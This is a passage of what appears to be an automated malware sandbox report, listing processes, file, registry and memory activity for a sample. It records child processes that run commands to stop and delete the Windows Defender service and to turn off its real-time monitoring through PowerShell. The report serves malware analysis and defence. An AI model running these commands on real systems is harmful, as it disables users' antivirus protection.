| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #5: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:27, Reason: Child Process |
| Unmonitor | End Time: 00:00:28, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc0 |
| Parent PID | 0xd94 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DC4
0x
DDC
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0x210000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:30:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10879447 |
|
1 | |
| Get Time | type = Performance Ctr, time = 10139722838 |
|
1 |
Process #6: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:27, Reason: Child Process |
| Unmonitor | End Time: 00:00:28, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc8 |
| Parent PID | 0xd78 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DCC
0x
DD8
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0x210000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:30:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10879416 |
|
1 | |
| Get Time | type = Performance Ctr, time = 10136278312 |
|
1 |
Process #7: powershell.exe
824
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Users\2XC7u663GxWc\Desktop\ |
| Monitor | Start Time: 00:00:27, Reason: Child Process |
| Unmonitor | End Time: 00:00:45, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdd0 |
| Parent PID | 0xd6c (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DD4
0x
DE0
0x
DE4
0x
DE8
0x
DEC
0x
DF0
0x
E18
0x
E1C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| microsoft.powershell.consolehost.ni.dll | 0x72240000 | 0x722C0FFF | Content Changed | - | 32-bit | 0x7229AF64, 0x72254390 |
|
|
|
| powershell.exe | 0x21F80000 | 0x21FF1FFF | Relevant Image | - | 32-bit | - |
|
|
|
| system.ni.dll | 0x6A240000 | 0x6A9DBFFF | Content Changed | - | 32-bit | 0x6A337964 |
|
|
|
| system.ni.dll | 0x6A240000 | 0x6A9DBFFF | Content Changed | - | 32-bit | 0x6A3A11E0 |
|
|
|
| system.ni.dll | 0x6A240000 | 0x6A9DBFFF | Content Changed | - | 32-bit | 0x6A357630 |
|
|
|
| system.ni.dll | 0x6A240000 | 0x6A9DBFFF | Content Changed | - | 32-bit | 0x6A372300 |
|
|
|
| system.ni.dll | 0x6A240000 | 0x6A9DBFFF | Content Changed | - | 32-bit | 0x6A34CFF8, 0x6A80009C, ... |
|
|
|
Host Behavior
File (398)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\2XC7u663GxWc | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\2XC7u663GxWc\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (190)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
